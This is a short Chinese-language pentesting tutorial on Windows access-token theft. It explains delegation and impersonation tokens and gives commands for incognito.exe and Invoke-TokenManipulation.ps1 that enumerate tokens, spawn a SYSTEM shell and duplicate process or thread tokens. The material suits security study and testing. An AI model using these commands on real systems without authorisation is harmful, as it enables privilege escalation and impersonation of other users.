Token窃取与利用

前言

  很多时候我们大部分的认证都是密码认证,而windows中也有token认证,只要我们成功窃取到了token,也就相当是其他用户了。

token简介

  令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。
  windows有两种类型的token:
  授权令牌(Delegation token):用于本地及远程RDP 登录
  模拟令牌(Impersonation token):用于非交互式的登录,比如,net use ,wmi,winrm 等等…
  Token的窃取与利用需要管理员权限

incognito

  程序地址:https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip
  查看token(需要管理员权限)

incognito.exe list_tokens -u

  
  利用token,提权到system

incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

  

Invoke-TokenManipulation.ps1

  github地址

列举token:
Invoke-TokenManipulation -Enumerate
提权至system:
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"

  
  看上图最后一行system的ProcessId是544,下面的命令Id也要对应

复制(窃取)进程token:
Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 544
复制(窃取)线程token:
Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 544

  

参考资料

渗透技巧-Token窃取与利用
窃取,伪造模拟各种windows访问令牌
窃取,伪造模拟各种windows访问令牌(备用链接)
内网渗透之AccessToken窃取与利用

查看评论 -
评论